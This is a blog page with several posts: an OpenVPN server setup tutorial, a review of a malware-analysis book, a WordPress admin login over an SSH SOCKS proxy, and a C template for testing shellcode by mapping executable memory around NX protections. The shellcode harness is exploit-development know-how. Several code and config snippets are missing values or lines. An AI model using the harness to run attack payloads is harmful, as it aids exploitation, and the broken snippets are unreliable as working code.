	add_filter('admin_url', array(&$this, 'replace_http_url'));

Feel free to post a comment if you have an questions!

VPNs: Setting up your own SSL VPN

“All I want for Christmas is my own VPN…my own VPN, my own VPN” – Dustin

I’ve been wanting to have access to my own secure VPN for quite some time so that when I’m away from home and only have access to insecure networks, I don’t have to use work’s VPN for personal use or worry about someone intercepting my traffic. I looked into a couple paid VPN solutions but none of them seem to guarantee your privacy as far as I’m concerned. I figured my best option was to setup and manage my own.

I chose to do all my setup on Ubuntu Linux but you can easily port these instructions to an alternative Linux distribution with relative ease.

Just a quick heads up before we dive in. This article is the first part of a two-part article on setting up your own VPN solution. In the first part, I show you how to set up an SSL VPN. The second part of the article (coming soon) will detail how to set up your own IPSEC VPN.

Creating your own SSL VPN using OpenVPN

An SSL VPN is generally all you’ll need for a secure VPN solution unless you want to use other devices that don’t support SSL VPNs, like an iPad, iPhone, or iPod Touch (see the second part of the article – coming soon).

Start by installing OpenVPN and DNSMasq for local DNS resolution

nobody@nobody:~/$ sudo apt-get install openvpn dnsmasq

OpenVPN comes with a bunch of scripts called easy-rsa that make generating your keys and certificates painless. We are going to make some local modifications to the scripts so it’s best to copy them into the /etc/openvpn directory

nobody@nobody:~/$ sudo cp -R  
> /usr/share/doc/openvpn/examples/easy-rsa/ /etc/openvpn

After copying, open this file

nobody@nobody:/etc/openvpn/easy-rsa/2.0$ sudo vi vars

and modify these values at the very end of the file, replacing YOUR_* with your information.

# These are the default values for fields
# which will be placed in the certificate.
# Don't leave any of these fields blank.

Now, load the values you just entered into your shell environment by ‘sourcing’ the vars file

nobody@nobody:/etc/openvpn/easy-rsa/2.0$ source vars

Next, generate the keys for the Certificate Authority (CA) – this is the certificate that will sign all certificates (client and server). If the above step worked properly you should just be able to press enter at each prompt except for the common name. For the common name, put “server-ca”.

nobody@nobody:/etc/openvpn/easy-rsa/2.0$ sudo ./build-ca

Now that we have the CA, we can create the keys for the client and the server. To create the server key, run the following. You’ll be prompted like last time where you can hit enter for everything except the common name. This time, for the common name, put “server”

nobody@nobody:/etc/openvpn/easy-rsa/2.0$ sudo 
> ./build-server-key server

For each client you have that will use the VPN, run this command, replacing “YOUR_CLIENT” with the name of the client

nobody@nobody:/etc/openvpn/easy-rsa/2.0$ sudo 
> ./build-key YOUR_CLIENT

As an extra security measure, we can generate a static key that will be required during SSL/TLS handshaking. Essentially what this does is it makes it so that unless a client uses this key during handshaking, OpenVPN will completely ignore the packet. To keep all of our keys in the same place, make sure you run this in the keys/ directory

nobody@nobody:/etc/openvpn/easy-rsa/2.0/keys$ sudo 
> openvpn --genkey --secret ta.key

One more script to run: the script to generate the Diffie-Hellman parameters. If you’re wondering what Diffie-Hellman is, it’s a secure method for the initial key exchange between the client and the server on an unsecured channel before the VPN is established.

nobody@nobody:/etc/openvpn/easy-rsa/2.0$ sudo ./build-dh

If you want to verify that you’ve done everything correctly up to this point, your /etc/openvpn/easy-rsa/2.0/keys directory should contain at least these files where “YOUR_CLIENT” has been replaced with what you used above for the client(s) name(s).

-rw-r--r-- 1 root root 1338 Dec 20 20:53 ca.crt
-rw------- 1 root root  887 Dec 20 20:53 ca.key
-rw-r--r-- 1 root root  245 Dec 20 20:57 dh1024.pem
-rw-r--r-- 1 root root 3918 Dec 20 20:57 YOUR_CLIENT.crt
-rw-r--r-- 1 root root  696 Dec 20 20:56 YOUR_CLIENT.csr
-rw------- 1 root root  887 Dec 20 20:56 YOUR_CLIENT.key
-rw-r--r-- 1 root root 4070 Dec 20 20:55 server.crt
-rw-r--r-- 1 root root  716 Dec 20 20:55 server.csr
-rw------- 1 root root  887 Dec 20 20:55 server.key
-rw------- 1 root root  636 Dec 20 20:56 ta.key

Copy the necessary keys we just created to /etc/openvpn so they can be used

nobody@nobody:/etc/openvpn/easy-rsa/2.0/keys$ sudo cp 
> ca.crt ca.key server.crt server.key dh1024.pem ta.key /etc/openvpn

Now that we are done generating keys and certificates, we have to create the ‘server.conf’ and ‘client.conf’ files for the client and server to read respectively. OpenVPN comes with a number of example configurations and it’s easiest to just start from there.

nobody@nobody:$ sudo cp 
> /usr/share/doc/openvpn/examples/sample-config-files/server.conf
> /usr/share/doc/openvpn/examples/sample-config-files/client.conf
> /etc/openvpn

Open server.conf and add the following lines

nobody@nobody:/etc/openvpn/$ sudo vi server.conf
# Enables traffic to be tunneled through the VPN
push "redirect-gateway def1"
# Sets the DNS server for VPN clients
push "dhcp-option DNS"
# TLS Auth key, drop ALL packets that don't HMAC with this key
# during handshake
tls-auth ta.key 0
# Use AES 256 bit key size with Cipher Block Chaining mode
cipher AES-256-CBC
# Drop privileges of the VPN service after its running
user nobody
group nogroup

Next, edit the client.conf, and edit and/or add these lines, replacing “YOUR_SERVER_ADDRESS” and “YOUR_CLIENT” with your values.

nobody@nobody:/etc/openvpn/$ sudo vi client.conf
# The address of the VPN server
# Downgrade priveleges
user nobody
group nogroup
# The name of the client key and cert
cert YOUR_CLIENT.crt
# The key to use during TLS/SSL handshaking
tls-auth ta.key 1
# Use AES 256 bit key size with Cipher Block Chaining mode
cipher AES-256-CBC

We’re now done with all of the OpenVPN settings but we need to tweak a few OS settings.

We have to turn off ICMP accept and send redirects and enable IP forwarding. You can do this by editing the /etc/sysctl.conf file and adding the following at the end of the file

nobody@nobody:~/$ sudo vi /etc/sysctl.conf

Now we need to add a few rules in iptables. You have to add them to a boot script so they’re not lost on reboot

nobody@nobody:~/$ sudo vi /etc/rc.local
# Use the 'state' module to ACCEPT RELATED or ESTABLISHED FORWARDed 
# connections
iptables -A FORWARD -m state --state RELATED,ESTABLISHED -j ACCEPT
# ACCEPT FORWARDed connections
iptables -A FORWARD -s -j ACCEPT
# REJECT all other FORWARDed connections
iptables -A FORWARD -j REJECT
# MASQUERADE any VPN addresses going out 
iptables -t nat -A POSTROUTING -s -o eth0 -j MASQUERADE

That’s all for configuration!

At this point, you can restart and everything will be configured when the machine is back up. Alternatively you can run the following if you don’t want to restart

nobody@nobody:~/$ sudo sysctl -p
nobody@nobody:~/$ sudo /etc/rc.local
nobody@nobody:~/$ sudo /etc/init.d/openvpn restart

Since we generated the client(s) keys on the server to make things easier, you MUST make sure that you transfer the client(s) keys using a secure channel like SCP or SFTP! So just to make things clear, securely copy the following files to the client, replacing “YOUR_CLIENT” as always.

  • ca.crt
  • ta.key
  • client.conf

Once you have all the necessary files on the client, it’s very easy to configure the client.

Mac OS X

Download Tunnelblick and place all config files in ~/Library/openvpn


Download the OpenVPN GUI and place all config files in C:/Program Files/OpenVPN/config, renaming client.conf to client.ovpn

Happy VPN’ing! Stay tuned for the second installment of this article where I show you how to setup an IPSEC VPN that’s compatible with any native iOS device like your iPhone or iPad.


Book Review: Malware Analyst’s Cookbook and DVD

As promised last week, here is my book review of the Malware Analyst’s Cookbook and DVD: Tools and Techniques for Fighting Malicious Codeby Michael Hale Ligh, Steven Adair, Blake Hartstein, and Matthew Richard.

About the Book

The book is a huge compilation of short how-to articles called recipes on the “tools and techniques for fighting malicious code.” In addition, the book comes with a number of very useful custom written tools for automating or speeding up the process.

The book is divided into several chapters which specialize on a specific topic. Some of the book’s topics include

  • Honeypots
  • Malware Classification
  • Malware Labs
  • Malware Forensics
  • Debugging Malware
  • Kernel Debugging
  • Memory Forensics (4 chapters of this)

Initial Impression

I had very high expectations for this book based on the fact that there aren’t many books out there on this subject and it’s something I’m particularly interested in. When I first received the book, I was pleasantly surprised at the literal size and the amount of content: this book isLOADED with information coming in at right close to 700 pages! A quick flip through the book told me that this book covers everything from very basic topics (e.g. using dig) to very advance topics (e.g. kernel debugging). I couldn’t wait to start the book!

The Audience/Skill Level

In the introductory part of the book, it has a small break down of “Who Should Read This Book.” Generally, I would sum it up as anyone and everyone that is interested in security would find this book interesting and entertaining.

The book supports a wide range of skills levels from beginners to advanced. A basic knowledge of C/C++ and some Windows API’s is helpful but not required. Likewise, a basic knowledge of Python is not required but would help if you’d like to better understand the scripts that the book provides.

The Book

This isn’t your typical “take-a-seat-and-read” type book. Get your laptop, your desktop, and even some old machines and be prepared to dive right in. The book focuses mainly on investigating Windows-based malware using tools mainly on Unix/Linux-based OS’es (Ubuntu, Mac OS X, etc) but there are some equivalent Windows based tools which the authors mention if available.

The recipe style of the book makes it very flexible to read and supports a wide range of audiences without confusing the newcomers and boring the advanced. Each recipe is self contained, well written, and easy to read. If you’re not interested in a specific recipe, you can never read it and you’ll have no problems following along in the rest of the book. Were applicable, a recipe provides links to additional information if you would like to take a deeper dive on the topic.

There are basically two approaches to reading this book. If you’re new to malware analysis, you can start from the beginning and progress to the end, skipping anything you already know or are not interested in, just like you would with any other book. The other approach would to be use the book as a shelf reference using the table of contents and index to search for what you’re trying to do.

The progression of the book is from basic to advanced, so if you’re intermediate or advanced, you can easily skip to the later sections right from the beginning, although in my case I did find some new information, tips, and tools in the basic section that I wasn’t aware of so the basic sections may be worth a quick skim.

The included DVD does prove to be useful unlike other books, not just for following along and understanding a concept, but more importantly, it contains a number of custom Python scripts all geared towards improving and easing your malware analysis. You can easily add these scripts to your toolkits.

No book review would be complete without listing some of it’s downsides. Luckily for this book, there are very few downsides. The first downside is completely unrelated to the content and has to do with the actual book itself. The soft cover binding of the book is somewhat cheap and wears pretty quickly due to the size and weight of the book. A hardcover edition with a solid, strong binding would be a great enhancement. The other downside has to do with the content. While I think the authors make a great effort to minimize the specifics of a tool and focus more generally on the purpose of the tool, there are a few sections of the book which might get outdated quickly if a tool changes. However, I think this is the nature of the beast with technical books so it shouldn’t be something to worry about or prevent you from buying the book!

The Punchline

I’d like throw a spin on Apple’s recently awarded trademark – “There’s an app for that.” Whatever topic it is your looking for related to analyzing malware, with The Malware Analyst’s Cookbook: “There’s a recipe for that.” Interested in analyzing the memory of a rootkit? There’s a recipe for that! Interested in setting up a malware lab? There’s a recipe for that!

All in all, I would highly recommend this book to anyone interested in security as well as those who want to learn more about malware analysis. I’d also highly recommend this book to professionals in the security field – keep a copy of this book right next to your computer, I guarantee you’ll find it useful!


Malware Analyst’s Cookbook and DVD: Tools and Techniques for Fighting Malicious Code (Paperback)

By (author): Michael Ligh, Steven Adair, Blake Hartstein, Matthew Richard

A computer forensics “how-to” for fighting malicious code and analyzing incidentsWith our ever-increasing reliance on computers comes an ever-growing risk of malware. Security professionals will find plenty of solutions in this book to the problems posed by viruses, Trojan horses, worms, spyware, rootkits, adware, and other invasive software. Written by well-known malware experts, this guide reveals solutions to numerous problems and includes a DVD of custom programs and tools that illustrate the concepts, enhancing your skills.

  • Security professionals face a constant battle against malicious software; this practical manual will improve your analytical capabilities and provide dozens of valuable and innovative solutions
  • Covers classifying malware, packing and unpacking, dynamic malware analysis, decoding and decrypting, rootkit detection, memory forensics, open source malware research, and much more
  • Includes generous amounts of source code in C, Python, and Perl to extend your favorite tools or build new ones, and custom programs on the DVD to demonstrate the solutions

Malware Analyst’s Cookbook is indispensible to IT security administrators, incident responders, forensic analysts, and malware researchers.

Secure WordPress Admin Login Without HTTPS

I use WordPress as my blogging platform and unfortunately I’m on a shared host that charges a lot extra in order to serve HTTPS…even if it’s a self-signed certificate. My only use for HTTPS is logging in to the WordPress administrative console for management and new posts so it doesn’t really make sense to fork over that extra cash. Likewise, I tried the shared certificate provided by my host but that sent WordPress into a redirect loop for some reason.

If you’re in the same boat as me, there are a couple things you can do without spending any money.

1. SOCKS5 SSH Proxy with Proxy Switcher Plugin

If you already have SSH enabled on your host, you’re in luck, just follow along. If not, I’d highly suggest you enable it; it usually takes a simple support ticket to your host to enable it. If for some reason you can’t enable it, skip straight to 2 below for a less secure alternative.

First, install a quick proxy switcher plugin for your browser – this will enable you to quickly switch back and forth between proxy and non-proxy without having to go deep into the settings of your browser and back.

Quick Proxy Switch Plugins

Multiproxy Switch and the user guide for configuring it.

Proxy Switchy and this one is pretty self explanatory to configure.

Once installed, configure your browser proxy switcher plugin to use a SOCKS5 proxy pointed to address with port 1234

Multiproxy Switcher will look like this


Proxy Switchy will look like this


Setup a Mac OS X/Linux SSH Proxy

If you’re using Mac OS X or any Linux variant, you can type the following at the command line which will setup your SSH proxy

nobody@nobody:~/$ ssh -D1234 username@yourdomain.com

alternatively, you can run it in the background since the above command will still require the shell to be open

nobody@nobody:~/$ ssh -D1234 -f -N username@yourdomain.com
Setup a SSH Windows Proxy

Download and install Putty

Configure your session like the image below


And then set up a Dynamic tunnel under the SSH/Tunnel menu by choosing the Dynamic radio button and then inputing 1234 into the source port and clicking add. It should look like this


With your proxy enabled, simply use the quick switch buttons on your proxy switcher browser plugin to switch over to using the proxy and log in to WordPress.

All traffic from your browser will be sent to local port 1234 which will be sent over an encrypted SSH proxy to your server. From there, it’s delivered right to your server with 1 hops. You can verify that with a local ‘traceroute’ on your server

nobody@nobody [~]# traceroute thexploit.com
traceroute to thexploit.com (, 30 hops max, 40 byte packets
 1  host182.hostmonster.com (  0.048 ms  0.017 ms  0.016 ms

If you’re skeptical that it’s working, you can visit http://www.whatismyip.com/ to see what your external IP address is. It should be the same as your server.

2. SemiSecure Login Reimagined

From the plugin site, here is the description

Semisecure Login Reimagined increases the security of the login process by using a combination of public and secret-key encryption to encrypt the password on the client-side when a user logs in. JavaScript is required to enable encryption. It is most useful for situations where SSL is not available, but the administrator wishes to have some additional security measures in place without sacrificing convenience.

Is it really secure?

Short answer: No, but it’s better than nothing.

Without SSL, you’re going to be susceptible to replay attacks/session hijacking no matter what. What this means is that if someone is able to guess or learn the session ID of a logged-in user (which would be trivial to do in an unprotected wireless network), then essentially they could do anything to your WordPress site by masquerading as that user.

The point of this is to prevent your password from being transmitted in the “clear.”

You can download and install it here.

Testing Your Unix-Based Shellcode on a Non-Executable Stack or Heap

I’ve been meaning to post about this technique I figured out while developing the OSX x86_64 setuid/shell shellcode [1] [2] I posted about last week but school and work have been pretty busy. It’s a simple technique that allows you to still test your shellcode on Unix-based OSes with non-executable stacks and heaps and can come in pretty handy for making sure your shellcode is right.

Non-Executable Stack & Heap

After developing your shellcode in an assembly environment (NASM/YASM, etc) and freeing it of null-bytes, it’s nice to be able to test your code in C environment (maybe you’re dyslexic and swapped a byte or two!). However, almost all modern day operating systems implement a non-executable stack and/or heap. That means, memory in these spaces have the Execute Disable Bit enabled; also referred to as the NX bit andW^X for the heap.

That means using ‘malloc’ to allocate space on the heap for your shellcode is not going to work, neither is a local char[SIZE] buffer since that will reside on the stack.

Anonymous Memory Map

To get around this, we can use an anonymous memory map sort of like ‘malloc’ but in addition we can pass in arguments to ‘mmap’ to make the mapped memory executable!

Here is an explanation of the anonymous parameter we pass to ‘mmap’ from the man page.

This flag tells the system to create an anonymous mapping, not connected to a file. filedes and off are ignored, and the region is initialized with zeros.
Anonymous maps are used as the basic primitive to extend the heap on some systems. They are also useful to share data between multiple tasks without creating a file.

On some systems using private anonymous mmaps is more efficient than using malloc for large blocks. This is not an issue with the GNU C library, as the included malloc automatically uses mmap where appropriate.

mmap returns the address of the new mapping, or -1 for an error.

and the executable parameter


Data can be executed.

Shellcode Testing Template

You can use the simple template below by replacing <YOUR SHELLCODE> with the respective shellcode you are testing and <SIZE OF YOUR SHELLCODE> with the number of bytes of your shellcode.

#include <stdio.h>
#include <sys/mman.h>
#include <string.h>
#include <stdlib.h>
int (*sc)();
char shellcode[] = "<YOUR SHELLCODE>";
int main(int argc, char **argv) {
    void *ptr = mmap(0, <SIZE OF YOUR SHELLCODE>, 
            | MAP_PRIVATE, -1, 0);
    if (ptr == MAP_FAILED) {
    memcpy(ptr, shellcode, sizeof(shellcode));
    sc = ptr;
    return 0;

That’s all there is too it! Questions or comments? I would love to hear them.

Also, if anyone has a similar technique for Windows (since I’m not familiar with the Windows API yet), I’d be willing to add it to this post.

Go to Top